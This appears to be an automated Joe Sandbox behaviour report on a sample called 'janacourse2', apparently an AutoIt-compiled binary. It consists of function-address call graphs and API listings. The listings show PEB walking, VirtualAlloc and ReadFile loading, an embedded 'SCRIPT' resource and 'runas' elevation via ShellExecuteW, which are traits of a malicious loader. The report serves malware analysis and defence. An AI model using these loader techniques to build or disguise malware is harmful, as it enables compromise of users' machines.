ff2e8e 96920->96896 96920->96934 96921->96925 96927 ff2db0 96921->96927 96922->96934 96923 fb3214 96938 fb3c50 DeleteObject DestroyWindow 96923->96938 96924 fb3263 96924->96934 96925->96896 96943 fb30f2 Shell_NotifyIconW ___scrt_fastfail 96925->96943 96939 fb326f 44 API calls ___scrt_fastfail 96926->96939 96940 fb18e2 10 API calls 96927->96940 96932->96896 96935 ff2e41 96944 fb3837 96935->96944 96937->96923 96938->96934 96939->96924 96940->96934 96941->96908 96942->96925 96943->96935 96945 fb3862 ___scrt_fastfail 96944->96945 96957 fb4212 96945->96957 96949 ff3386 Shell_NotifyIconW 96950 fb3906 Shell_NotifyIconW 96961 fb3923 96950->96961 96951 fb38e8 96951->96949 96951->96950 96953 fb391c 96953->96932 96954->96932 96955->96924 96956->96920 96958 ff35a4 96957->96958 96959 fb38b7 96957->96959 96958->96959 96960 ff35ad DestroyIcon 96958->96960 96959->96951 96983 101c874 42 API calls _strftime 96959->96983 96960->96959 96962 fb393f 96961->96962 96963 fb3a13 96961->96963 96964 fb6270 22 API calls 96962->96964 96963->96953 96965 fb394d 96964->96965 96966 fb395a 96965->96966 96967 ff3393 LoadStringW 96965->96967 96968 fb6b57 22 API calls 96966->96968 96969 ff33ad 96967->96969 96970 fb396f 96968->96970 96977 fb3994 ___scrt_fastfail 96969->96977 96984 fba8c7 22 API calls __fread_nolock 96969->96984 96971 ff33c9 96970->96971 96972 fb397c 96970->96972 96973 fb6350 22 API calls 96971->96973 96972->96969 96975 fb3986 96972->96975 96978 ff33d7 96973->96978 96976 fb6350 22 API calls 96975->96976 96976->96977 96980 fb39f9 Shell_NotifyIconW 96977->96980 96978->96977 96979 fb33c6 22 API calls 96978->96979 96981 ff33f9 96979->96981 96980->96963 96982 fb33c6 22 API calls 96981->96982 96982->96977 96983->96951 96984->96977 96985 14dad98 96999 14d89e8 96985->96999 96987 14dae6c 97002 14dac88 96987->97002 96989 14dae95 CreateFileW 96991 14daee9 96989->96991 96992 14daee4 96989->96992 96991->96992 96993 14daf00 VirtualAlloc 96991->96993 96993->96992 96994 14daf1e ReadFile 96993->96994 
96994->96992 96995 14daf39 96994->96995 96996 14d9c88 13 API calls 96995->96996 96998 14daf6c 96996->96998 96997 14daf8f ExitProcess 96997->96992 96998->96997 97005 14dbe98 GetPEB 96999->97005 97001 14d9073 97001->96987 97003 14dac91 Sleep 97002->97003 97004 14dac9f 97003->97004 97006 14dbec2 97005->97006 97006->97001 97007 fb1cad SystemParametersInfoW 97008 fb2de3 97009 fb2df0 __wsopen_s 97008->97009 97010 fb2e09 97009->97010 97011 ff2c2b ___scrt_fastfail 97009->97011 97012 fb3aa2 23 API calls 97010->97012 97014 ff2c47 GetOpenFileNameW 97011->97014 97013 fb2e12 97012->97013 97024 fb2da5 97013->97024 97016 ff2c96 97014->97016 97017 fb6b57 22 API calls 97016->97017 97019 ff2cab 97017->97019 97019->97019 97021 fb2e27 97042 fb44a8 97021->97042 97025 ff1f50 __wsopen_s 97024->97025 97026 fb2db2 GetLongPathNameW 97025->97026 97027 fb6b57 22 API calls 97026->97027 97028 fb2dda 97027->97028 97029 fb3598 97028->97029 97030 fba961 22 API calls 97029->97030 97031 fb35aa 97030->97031 97032 fb3aa2 23 API calls 97031->97032 97033 fb35b5 97032->97033 97034 fb35c0 97033->97034 97039 ff32eb 97033->97039 97035 fb515f 22 API calls 97034->97035 97037 fb35cc 97035->97037 97072 fb35f3 97037->97072 97040 ff330d 97039->97040 97078 fcce60 41 API calls 97039->97078 97041 fb35df 97041->97021 97043 fb4ecb 94 API calls 97042->97043 97044 fb44cd 97043->97044 97045 ff3833 97044->97045 97047 fb4ecb 94 API calls 97044->97047 97046 1022cf9 80 API calls 97045->97046 97048 ff3848 97046->97048 97049 fb44e1 97047->97049 97050 ff384c 97048->97050 97051 ff3869 97048->97051 97049->97045 97052 fb44e9 97049->97052 97053 fb4f39 68 API calls 97050->97053 97054 fcfe0b 22 API calls 97051->97054 97055 ff3854 97052->97055 97056 fb44f5 97052->97056 97053->97055 97071 ff38ae 97054->97071 97089 101da5a 82 API calls 97055->97089 97088 fb940c 136 API calls 2 library calls 97056->97088 97059 ff3862 97059->97051 97060 fb2e31 97061 ff3a5f 97062 ff3a67 97061->97062 97063 fb4f39 68 API calls 97062->97063 97092 101989b 82 
API calls __wsopen_s 97062->97092 97063->97062 97064 fba4a1 22 API calls 97064->97071 97068 fb9cb3 22 API calls 97068->97071 97071->97061 97071->97062 97071->97064 97071->97068 97079 101967e 97071->97079 97082 fb3ff7 97071->97082 97090 10195ad 42 API calls _wcslen 97071->97090 97091 1020b5a 22 API calls 97071->97091 97073 fb3605 97072->97073 97077 fb3624 __fread_nolock 97072->97077 97075 fcfe0b 22 API calls 97073->97075 97074 fcfddb 22 API calls 97076 fb363b 97074->97076 97075->97077 97076->97041 97077->97074 97078->97039 97080 fcfe0b 22 API calls 97079->97080 97081 10196ae __fread_nolock 97080->97081 97081->97071 97083 fb400a 97082->97083 97087 fb40ae 97082->97087 97084 fcfe0b 22 API calls 97083->97084 97086 fb403c 97083->97086 97084->97086 97085 fcfddb 22 API calls 97085->97086 97086->97085 97086->97087 97087->97071 97088->97060 97089->97059 97090->97071 97091->97071 97092->97062 97093 ff2ba5 97094 ff2baf 97093->97094 97095 fb2b25 97093->97095 97097 fb3a5a 24 API calls 97094->97097 97121 fb2b83 7 API calls 97095->97121 97099 ff2bb8 97097->97099 97101 fb9cb3 22 API calls 97099->97101 97103 ff2bc6 97101->97103 97102 fb2b2f 97106 fb2b44 97102->97106 97109 fb3837 49 API calls 97102->97109 97104 ff2bce 97103->97104 97105 ff2bf5 97103->97105 97107 fb33c6 22 API calls 97104->97107 97108 fb33c6 22 API calls 97105->97108 97112 fb2b5f 97106->97112 97125 fb30f2 Shell_NotifyIconW ___scrt_fastfail 97106->97125 97110 ff2bd9 97107->97110 97111 ff2bf1 GetForegroundWindow ShellExecuteW 97108->97111 97109->97106 97113 fb6350 22 API calls 97110->97113 97117 ff2c26 97111->97117 97119 fb2b66 SetCurrentDirectoryW 97112->97119 97116 ff2be7 97113->97116 97118 fb33c6 22 API calls 97116->97118 97117->97112 97118->97111 97120 fb2b7a 97119->97120 97126 fb2cd4 7 API calls 97121->97126 97123 fb2b2a 97124 fb2c63 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 97123->97124 97124->97102 97125->97112 97126->97123 97127 fe8402 97132 fe81be 97127->97132 97131 fe842a 97137 fe81ef 
try_get_first_available_module 97132->97137 97134 fe83ee 97151 fe27ec 26 API calls pre_c_initialization 97134->97151 97136 fe8343 97136->97131 97144 ff0984 97136->97144 97140 fe8338 97137->97140 97147 fd8e0b 40 API calls 2 library calls 97137->97147 97139 fe838c 97139->97140 97148 fd8e0b 40 API calls 2 library calls 97139->97148 97140->97136 97150 fdf2d9 20 API calls __dosmaperr 97140->97150 97142 fe83ab 97142->97140 97149 fd8e0b 40 API calls 2 library calls 97142->97149 97152 ff0081 97144->97152 97146 ff099f 97146->97131 97147->97139 97148->97142 97149->97140 97150->97134 97151->97136 97155 ff008d ___BuildCatchObject 97152->97155 97153 ff009b 97209 fdf2d9 20 API calls __dosmaperr 97153->97209 97155->97153 97157 ff00d4 97155->97157 97156 ff00a0 97210 fe27ec 26 API calls pre_c_initialization 97156->97210 97163 ff065b 97157->97163 97162 ff00aa __fread_nolock 97162->97146 97164 ff0678 97163->97164 97165 ff068d 97164->97165 97166 ff06a6 97164->97166 97226 fdf2c6 20 API calls __dosmaperr 97165->97226 97212 fe5221 97166->97212 97169 ff0692 97227 fdf2d9 20 API calls __dosmaperr 97169->97227 97170 ff06ab 97171 ff06cb 97170->97171 97172 ff06b4 97170->97172 97225 ff039a CreateFileW 97171->97225 97228 fdf2c6 20 API calls __dosmaperr 97172->97228 97176 ff06b9 97229 fdf2d9 20 API calls __dosmaperr 97176->97229 97177 ff0781 GetFileType 97180 ff078c GetLastError 97177->97180 97181 ff07d3 97177->97181 97179 ff0756 GetLastError 97231 fdf2a3 20 API calls __dosmaperr 97179->97231 97232 fdf2a3 20 API calls __dosmaperr 97180->97232 97234 fe516a 21 API calls 2 library calls 97181->97234 97182 ff0704 97182->97177 97182->97179 97230 ff039a CreateFileW 97182->97230 97186 ff079a CloseHandle 97186->97169 97189 ff07c3 97186->97189 97188 ff0749 97188->97177 97188->97179 97233 fdf2d9 20 API calls __dosmaperr 97189->97233 97190 ff07f4 97193 ff0840 97190->97193 97235 ff05ab 72 API calls 3 library calls 97190->97235 97192 ff07c8 97192->97169 97197 ff086d 97193->97197 97236 ff014d 72 API calls 4 
library calls 97193->97236 97196 ff0866 97196->97197 97198 ff087e 97196->97198 97199 fe86ae __wsopen_s 29 API calls 97197->97199 97200 ff00f8 97198->97200 97201 ff08fc CloseHandle 97198->97201 97199->97200 97211 ff0121 LeaveCriticalSection __wsopen_s 97200->97211 97237 ff039a CreateFileW 97201->97237 97203 ff0927 97204 ff095d 97203->97204 97205 ff0931 GetLastError 97203->97205 97204->97200 97238 fdf2a3 20 API calls __dosmaperr 97205->97238 97207 ff093d 97239 fe5333 21 API calls 2 library calls 97207->97239 97209->97156 97210->97162 97211->97162 97213 fe522d ___BuildCatchObject 97212->97213 97240 fe2f5e EnterCriticalSection 97213->97240 97215 fe527b 97241 fe532a 97215->97241 97217 fe5234 97217->97215 97218 fe5259 97217->97218 97222 fe52c7 EnterCriticalSection 97217->97222 97220 fe5000 __wsopen_s 21 API calls 97218->97220 97219 fe52a4 __fread_nolock 97219->97170 97221 fe525e 97220->97221 97221->97215 97244 fe5147 EnterCriticalSection 97221->97244 97222->97215 97223 fe52d4 LeaveCriticalSection 97222->97223 97223->97217 97225->97182 97226->97169 97227->97200 97228->97176 97229->97169 97230->97188 97231->97169 97232->97186 97233->97192 97234->97190 97235->97193 97236->97196 97237->97203 97238->97207 97239->97204 97240->97217 97245 fe2fa6 LeaveCriticalSection 97241->97245 97243 fe5331 97243->97219 97244->97215 97245->97243 97246 fbdee5 97249 fbb710 97246->97249 97250 fbb72b 97249->97250 97251 1000146 97250->97251 97252 10000f8 97250->97252 97271 fbb750 97250->97271 97291 10358a2 207 API calls 2 library calls 97251->97291 97255 1000102 97252->97255 97258 100010f 97252->97258 97252->97271 97289 1035d33 207 API calls 97255->97289 97270 fbba20 97258->97270 97290 10361d0 207 API calls 2 library calls 97258->97290 97261 fcd336 40 API calls 97261->97271 97262 10003d9 97262->97262 97266 fbba4e 97267 1000322 97295 1035c0c 82 API calls 97267->97295 97270->97266 97296 102359c 82 API calls __wsopen_s 97270->97296 97271->97261 97271->97266 97271->97267 97271->97270 97276 fbbbe0 40 
API calls 97271->97276 97277 fbec40 207 API calls 97271->97277 97280 fba81b 41 API calls 97271->97280 97281 fcd2f0 40 API calls 97271->97281 97282 fca01b 207 API calls 97271->97282 97283 fd0242 5 API calls __Init_thread_wait 97271->97283 97284 fcedcd 22 API calls 97271->97284 97285 fd00a3 29 API calls __onexit 97271->97285 97286 fd01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97271->97286 97287 fcee53 82 API calls 97271->97287 97288 fce5ca 207 API calls 97271->97288 97292 fbaceb 23 API calls ISource 97271->97292 97293 100f6bf 23 API calls 97271->97293 97294 fba8c7 22 API calls __fread_nolock 97271->97294 97276->97271 97277->97271 97280->97271 97281->97271 97282->97271 97283->97271 97284->97271 97285->97271 97286->97271 97287->97271 97288->97271 97289->97258 97290->97270 97291->97271 97292->97271 97293->97271 97294->97271 97295->97270 97296->97262 97297 fb1044 97302 fb10f3 97297->97302 97299 fb104a 97338 fd00a3 29 API calls __onexit 97299->97338 97301 fb1054 97339 fb1398 97302->97339 97306 fb116a 97307 fba961 22 API calls 97306->97307 97308 fb1174 97307->97308 97309 fba961 22 API calls 97308->97309 97310 fb117e 97309->97310 97311 fba961 22 API calls 97310->97311 97312 fb1188 97311->97312 97313 fba961 22 API calls 97312->97313 97314 fb11c6 97313->97314 97315 fba961 22 API calls 97314->97315 97316 fb1292 97315->97316 97349 fb171c 97316->97349 97320 fb12c4 97321 fba961 22 API calls 97320->97321 97322 fb12ce 97321->97322 97323 fc1940 9 API calls 97322->97323 97324 fb12f9 97323->97324 97370 fb1aab 97324->97370 97326 fb1315 97327 fb1325 GetStdHandle 97326->97327 97328 fb137a 97327->97328 97329 ff2485 97327->97329 97332 fb1387 OleInitialize 97328->97332 97329->97328 97330 ff248e 97329->97330 97331 fcfddb 22 API calls 97330->97331 97333 ff2495 97331->97333 97332->97299 97377 102011d InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 97333->97377 97335 ff249e 97378 1020944 CreateThread 
97335->97378 97337 ff24aa CloseHandle 97337->97328 97338->97301 97379 fb13f1 97339->97379 97342 fb13f1 22 API calls 97343 fb13d0 97342->97343 97344 fba961 22 API calls 97343->97344 97345 fb13dc 97344->97345 97346 fb6b57 22 API calls 97345->97346 97347 fb1129 97346->97347 97348 fb1bc3 6 API calls 97347->97348 97348->97306 97350 fba961 22 API calls 97349->97350 97351 fb172c 97350->97351 97352 fba961 22 API calls 97351->97352 97353 fb1734 97352->97353 97354 fba961 22 API calls 97353->97354 97355 fb174f 97354->97355 97356 fcfddb 22 API calls 97355->97356 97357 fb129c 97356->97357 97358 fb1b4a 97357->97358 97359 fb1b58 97358->97359 97360 fba961 22 API calls 97359->97360 97361 fb1b63 97360->97361 97362 fba961 22 API calls 97361->97362 97363 fb1b6e 97362->97363 97364 fba961 22 API calls 97363->97364 97365 fb1b79 97364->97365 97366 fba961 22 API calls 97365->97366 97367 fb1b84 97366->97367 97368 fcfddb 22 API calls 97367->97368 97369 fb1b96 RegisterWindowMessageW 97368->97369 97369->97320 97371 fb1abb 97370->97371 97372 ff272d 97370->97372 97373 fcfddb 22 API calls 97371->97373 97386 1023209 23 API calls 97372->97386 97375 fb1ac3 97373->97375 97375->97326 97376 ff2738 97377->97335 97378->97337 97387 102092a 28 API calls 97378->97387 97380 fba961 22 API calls 97379->97380 97381 fb13fc 97380->97381 97382 fba961 22 API calls 97381->97382 97383 fb1404 97382->97383 97384 fba961 22 API calls 97383->97384 97385 fb13c6 97384->97385 97385->97342 97386->97376

                                                                                                            Control-flow Graph

                                                                                                            control_flow_graph 234 fb42de-fb434d call fba961 GetVersionExW call fb6b57 239 ff3617-ff362a 234->239 240 fb4353 234->240 242 ff362b-ff362f 239->242 241 fb4355-fb4357 240->241 243 fb435d-fb43bc call fb93b2 call fb37a0 241->243 244 ff3656 241->244 245 ff3632-ff363e 242->245 246 ff3631 242->246 263 ff37df-ff37e6 243->263 264 fb43c2-fb43c4 243->264 250 ff365d-ff3660 244->250 245->242 247 ff3640-ff3642 245->247 246->245 247->241 249 ff3648-ff364f 247->249 249->239 252 ff3651 249->252 253 fb441b-fb4435 GetCurrentProcess IsWow64Process 250->253 254 ff3666-ff36a8 250->254 252->244 256 fb4437 253->256 257 fb4494-fb449a 253->257 254->253 258 ff36ae-ff36b1 254->258 260 fb443d-fb4449 256->260 257->260 261 ff36db-ff36e5 258->261 262 ff36b3-ff36bd 258->262 265 fb444f-fb445e LoadLibraryA 260->265 266 ff3824-ff3828 GetSystemInfo 260->266 270 ff36f8-ff3702 261->270 271 ff36e7-ff36f3 261->271 267 ff36bf-ff36c5 262->267 268 ff36ca-ff36d6 262->268 272 ff37e8 263->272 273 ff3806-ff3809 263->273 264->250 269 fb43ca-fb43dd 264->269 278 fb449c-fb44a6 GetSystemInfo 265->278 279 fb4460-fb446e GetProcAddress 265->279 267->253 268->253 280 fb43e3-fb43e5 269->280 281 ff3726-ff372f 269->281 274 ff3715-ff3721 270->274 275 ff3704-ff3710 270->275 271->253 282 ff37ee 272->282 276 ff380b-ff381a 273->276 277 ff37f4-ff37fc 273->277 274->253 275->253 276->282 285 ff381c-ff3822 276->285 277->273 287 fb4476-fb4478 278->287 279->278 286 fb4470-fb4474 GetNativeSystemInfo 279->286 288 fb43eb-fb43ee 280->288 289 ff374d-ff3762 280->289 283 ff373c-ff3748 281->283 284 ff3731-ff3737 281->284 282->277 283->253 284->253 285->277 286->287 294 fb447a-fb447b FreeLibrary 287->294 295 fb4481-fb4493 287->295 290 ff3791-ff3794 288->290 291 fb43f4-fb440f 288->291 292 ff376f-ff377b 289->292 293 ff3764-ff376a 289->293 290->253 298 ff379a-ff37c1 290->298 296 fb4415 291->296 297 ff3780-ff378c 291->297 292->253 293->253 
294->295 296->253 297->253 299 ff37ce-ff37da 298->299 300 ff37c3-ff37c9 298->300 299->253 300->253
                                                                                                            APIs
                                                                                                            • GetVersionExW.KERNEL32(?), ref: 00FB430D
                                                                                                              • Part of subcall function 00FB6B57: _wcslen.LIBCMT ref: 00FB6B6A
                                                                                                            • GetCurrentProcess.KERNEL32(?,0104CB64,00000000,?,?), ref: 00FB4422
                                                                                                            • IsWow64Process.KERNEL32(00000000,?,?), ref: 00FB4429
                                                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00FB4454
                                                                                                            • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00FB4466
                                                                                                            • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00FB4474
                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?), ref: 00FB447B
                                                                                                            • GetSystemInfo.KERNEL32(?,?,?), ref: 00FB44A0
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                                                                                            • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                                                                                            • API String ID: 3290436268-3101561225
                                                                                                            • Opcode ID: 0a1b127b1bdc3d2bd63358ad9ce2a18c36060f5f6256971568631e1d1193203f
                                                                                                            • Instruction ID: 6859cad03b5dea153378e9071c39d8632e765cdad9135644c9eceb64304931fd
                                                                                                            • Opcode Fuzzy Hash: 0a1b127b1bdc3d2bd63358ad9ce2a18c36060f5f6256971568631e1d1193203f
                                                                                                            • Instruction Fuzzy Hash: A5A1C576D0E2D4DFC731D76AB1806ED7FA46F26710B08C899D4C1A3A0AD27E4506EFA1

                                                                                                            Control-flow Graph

                                                                                                            control_flow_graph 553 fb42a2-fb42ba CreateStreamOnHGlobal 554 fb42da-fb42dd 553->554 555 fb42bc-fb42d3 FindResourceExW 553->555 556 fb42d9 555->556 557 ff35ba-ff35c9 LoadResource 555->557 556->554 557->556 558 ff35cf-ff35dd SizeofResource 557->558 558->556 559 ff35e3-ff35ee LockResource 558->559 559->556 560 ff35f4-ff3612 559->560 560->556
                                                                                                            APIs
                                                                                                            • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00FB50AA,?,?,00000000,00000000), ref: 00FB42B2
                                                                                                            • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00FB50AA,?,?,00000000,00000000), ref: 00FB42C9
                                                                                                            • LoadResource.KERNEL32(?,00000000,?,?,00FB50AA,?,?,00000000,00000000,?,?,?,?,?,?,00FB4F20), ref: 00FF35BE
                                                                                                            • SizeofResource.KERNEL32(?,00000000,?,?,00FB50AA,?,?,00000000,00000000,?,?,?,?,?,?,00FB4F20), ref: 00FF35D3
                                                                                                            • LockResource.KERNEL32(00FB50AA,?,?,00FB50AA,?,?,00000000,00000000,?,?,?,?,?,?,00FB4F20,?), ref: 00FF35E6
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                            • String ID: SCRIPT
                                                                                                            • API String ID: 3051347437-3967369404
                                                                                                            • Opcode ID: 14b5ff9088eb1140d1266704a69fa86ae0d0d25ab84920a73ce2e3e44dededc0
                                                                                                            • Instruction ID: 3b7d98ccdad3cced64a54caf232b0a86c90f338852ef37b41d7d6c788703b9bf
                                                                                                            • Opcode Fuzzy Hash: 14b5ff9088eb1140d1266704a69fa86ae0d0d25ab84920a73ce2e3e44dededc0
                                                                                                            • Instruction Fuzzy Hash: 0F11A0B4301700BFE7218FA6DE89F677BB9EBC5B51F14416DB84686150DB71EC00AA30

Control-flow Graph

APIs
• SetCurrentDirectoryW.KERNEL32(?), ref: 00FB2B6B
  • Part of subcall function 00FB3A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,01081418,?,00FB2E7F,?,?,?,00000000), ref: 00FB3A78
  • Part of subcall function 00FB9CB3: _wcslen.LIBCMT ref: 00FB9CBD
• GetForegroundWindow.USER32(runas,?,?,?,?,?,01072224), ref: 00FF2C10
• ShellExecuteW.SHELL32(00000000,?,?,01072224), ref: 00FF2C17
Strings
Memory Dump Source
• Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
Similarity
• API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
• String ID: runas
• API String ID: 448630720-4000483414
• Opcode ID: d3e8325c3fb1e6be890c911fc42072f1410dc08acfe9306ee52ba92c655c9778
• Instruction ID: 55b7b9e9257df595bc8c7fc487501799741bcf576927728ebf4291019599ff51
• Opcode Fuzzy Hash: d3e8325c3fb1e6be890c911fc42072f1410dc08acfe9306ee52ba92c655c9778
• Instruction Fuzzy Hash: EB11DF316083056AC714FF66DC919EE7BA4AFD5310F48541DF2C2060A2CF398A4AAB12
APIs
• GetInputState.USER32 ref: 00FBD807
• timeGetTime.WINMM ref: 00FBDA07
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00FBDB28
• TranslateMessage.USER32(?), ref: 00FBDB7B
• DispatchMessageW.USER32(?), ref: 00FBDB89
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00FBDB9F
• Sleep.KERNEL32(0000000A), ref: 00FBDBB1
Memory Dump Source
• Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
Similarity
• API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
• String ID:
• API String ID: 2189390790-0
• Opcode ID: e2e81a7196e4698051f001aac606f2659b01a75d28329279802647f2f3782a91
• Instruction ID: fe8b1fb6ecd66bee2dbe6925207ae2133e8fd652d9cb2bdfd06f7f5acbdbc70b
• Opcode Fuzzy Hash: e2e81a7196e4698051f001aac606f2659b01a75d28329279802647f2f3782a91
• Instruction Fuzzy Hash: 1C420370608242EFE72ACF25C888BAABBE0BF85314F14855DE4D587291E775E844DF92

Control-flow Graph

APIs
• GetSysColorBrush.USER32(0000000F), ref: 00FB2D07
• RegisterClassExW.USER32(00000030), ref: 00FB2D31
• RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00FB2D42
• InitCommonControlsEx.COMCTL32(?), ref: 00FB2D5F
• ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00FB2D6F
• LoadIconW.USER32(000000A9), ref: 00FB2D85
• ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00FB2D94
Strings
Memory Dump Source
• Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
Similarity
• API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
• String ID: +$0$AutoIt v3 GUI$TaskbarCreated
• API String ID: 2914291525-1005189915
• Opcode ID: 55dca9242f0cb2da827a2a9e9a61967a1f52a0db53d9cb9ab087b2fdda2155df
• Instruction ID: f5100ae5c95c06c5dc6b0909c7bb5f16191c003559461e4d15ef46d38a611763
• Opcode Fuzzy Hash: 55dca9242f0cb2da827a2a9e9a61967a1f52a0db53d9cb9ab087b2fdda2155df
• Instruction Fuzzy Hash: 52211DB5D06308AFEB20DF94EA89BDD7BB4FB08700F00411AF5D1A6284D7BA0541CF50

Control-flow Graph

APIs
  • Part of subcall function 00FF039A: CreateFileW.KERNELBASE(00000000,00000000,?,00FF0704,?,?,00000000,?,00FF0704,00000000,0000000C), ref: 00FF03B7
• GetLastError.KERNEL32 ref: 00FF076F
• __dosmaperr.LIBCMT ref: 00FF0776
• GetFileType.KERNELBASE(00000000), ref: 00FF0782
• GetLastError.KERNEL32 ref: 00FF078C
• __dosmaperr.LIBCMT ref: 00FF0795
• CloseHandle.KERNEL32(00000000), ref: 00FF07B5
• CloseHandle.KERNEL32(?), ref: 00FF08FF
• GetLastError.KERNEL32 ref: 00FF0931
• __dosmaperr.LIBCMT ref: 00FF0938
Strings
Memory Dump Source
• Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
Similarity
• API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
• String ID: H
• API String ID: 4237864984-2852464175
• Opcode ID: 8edfa7b03dcf0479a3263f6c3cef784981b6abd05ae5f5f24ea6f73e8ae00ed9
• Instruction ID: d326fb06b4027cd46e0d7bd29020ef97df315792cce728fd10d3db573c9daee8
• Opcode Fuzzy Hash: 8edfa7b03dcf0479a3263f6c3cef784981b6abd05ae5f5f24ea6f73e8ae00ed9
